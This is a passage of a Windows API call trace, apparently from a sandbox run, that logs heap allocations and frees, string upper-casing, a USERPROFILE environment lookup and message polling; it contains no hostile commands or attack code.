lpsz="A2100602512") returned 0xb [0203.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0203.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0203.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0203.201] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0203.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0203.202] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0203.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0203.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0203.203] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0203.203] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0203.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0203.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0203.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0203.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0203.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0203.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0203.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0203.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0203.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0203.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0203.206] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0203.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0203.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0203.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0203.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0203.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0203.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0203.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0203.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0203.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.207] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0203.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0203.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0203.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0203.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0203.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 